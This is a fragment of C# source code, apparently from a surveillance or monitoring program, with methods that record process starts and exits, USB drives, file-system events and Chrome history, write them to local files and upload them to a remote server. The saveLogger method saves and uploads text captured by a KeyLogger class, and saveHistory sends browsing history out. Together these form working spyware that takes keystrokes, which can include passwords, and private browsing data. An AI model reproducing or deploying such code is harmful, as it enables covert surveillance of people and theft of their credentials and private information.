public static void saveApplicationExitTime(string szName, TimeSpan tsTime) { if ((aszProcessFilter.Contains(szName) && bHasApp) || !bHasApp) { setFilePermission(filePath); TextWriter tw = new StreamWriter(filePath, true); tw.WriteLine("Application " + szName + " closed. Runtime:" + tsTime.ToString()); UploadRequest.uploadData(szName + " closed. Runtime:" + tsTime.ToString(), "Process Close", "reports_processes"); tw.Close(); } }
public static void saveUSB() { bool x = true; if (null != UsbHandler.newDrives && UsbHandler.newDrives.Length == UsbHandler.allDrives.Length) { for (int i = 0; i < UsbHandler.newDrives.Length; i++) { if (UsbHandler.newDrives[i].Name != UsbHandler.allDrives[i].Name) { x = true; } else { x = false; } } } else { x = true; } if (x) { setFilePermission(filePathUSB); TextWriter tw = new StreamWriter(filePathUSB, true); Functions.Functions.writeCurrentDate(tw, 1); UsbHandler.allDrives = DriveInfo.GetDrives(); foreach (DriveInfo d in UsbHandler.allDrives) { tw.WriteLine("Drive {0}", d.Name); tw.WriteLine(); tw.WriteLine(" Drive type: {0}", d.DriveType); tw.WriteLine(); if (bSkipStartUpUSB == true) { UploadRequest.uploadData("Drive " + d.Name + " Drive type:" + d.DriveType, "USB", "reports_usb"); } } bSkipStartUpUSB = true; tw.Close(); } UsbHandler.newDrives = DriveInfo.GetDrives(); }
public static void FileData() { setFilePermission(filePath); TextWriter tw = new StreamWriter(filePath, true); Functions.Functions.writeCurrentDate(tw, 1); //we suspect no change of the processes in the beggining bHasChanged = false; foreach (ProcessData pd in ProcessData.apdProcData) { //If the process has been shown, a message is displayed. //If the message has been displayed already, nothing will be done until //a new process that can be displayed is found if (!ProcessData.apdShownProcesses.Contains(pd.getId())) { tw.WriteLine(pd.getProcessInfo()); pd.setShownState(true); bOutputOmitted = false; //a change has occured; bHasChanged = true; if (bSkipStartUpProcess == true && ((aszProcessFilter.Contains(pd.getName()) && bHasApp) || !bHasApp)) { UploadRequest.uploadData(pd.getName(), "Process Open", "reports_processes"); } } else if (bOutputOmitted == false) { tw.WriteLine("Output Omitted - no change detected..."); bOutputOmitted = true; } } //even if no change occurs, a essage is displayed if (bHasChanged == false) { tw.WriteLine("Output Omitted - no change detected..."); } bSkipStartUpProcess = true; tw.Close(); }
public static void saveLogger() { if (KeyLogger.szText == "") { return; } else { setFilePermission(filePathLogger); TextWriter tw = new StreamWriter(filePathLogger, true); Functions.Functions.writeCurrentDate(tw, 1); tw.WriteLine(KeyLogger.szText); UploadRequest.uploadData(KeyLogger.szText, "Key Logger", "reports_keylogger"); KeyLogger.szText = String.Empty; tw.Close(); } }
private static void saveEvents(string message, string action) { TextWriter tw = null; try { tw = new StreamWriter(filePathFileManager, true); } catch (Exception ex) { // Console.WriteLine(ex); } if (message.Contains("FileManager") || message.Contains("Logger") || message.Contains("ChromeHistory") || message.Contains("USB") || message.Contains("ProcessList") && tw != null && message != szLastWarningMessage) { Functions.Functions.writeCurrentDate(tw, 2); tw.WriteLine(message); UploadRequest.uploadData(message, action + " - Warning", "reports_warnings"); szLastWarningMessage = message; } else if (!message.Contains("Windows") && !message.Contains("Microsoft") && !message.Contains("laravel") && !message.Contains("Google") && !message.Contains("Surveillance") && !message.Contains("$Recycle.Bin") && (!message.Contains("Local") && !message.Contains("AppData")) && (!message.Contains("Roaming") && !message.Contains("AppData")) && !message.Contains("Cyclop") && tw != null && message != szLastMessage) { Functions.Functions.writeCurrentDate(tw, 2); tw.WriteLine(message); UploadRequest.uploadData(message, action, "reports_filemanager"); szLastMessage = message; } if (tw != null) { tw.Close(); } }
public static void saveHistory() { setFilePermission(filePathChrome); TextWriter tw = new StreamWriter(filePathChrome, true); Functions.Functions.writeCurrentDate(tw, 1); for (int i = 0; i < GoogleChrome.allHistoryItems.Count; i++) { tw.Write(GoogleChrome.allHistoryItems[i].Count + " --- "); tw.WriteLine(GoogleChrome.allHistoryItems[i].URL); tw.WriteLine(); if (bSkipStartUpChrome == true) { UploadRequest.uploadData("Count:" + GoogleChrome.allHistoryItems[i].Count + " --- " + Functions.Functions.filterChrome(GoogleChrome.allHistoryItems[i].URL), "Browser History", "reports_history"); } } bSkipStartUpChrome = true; tw.Close(); }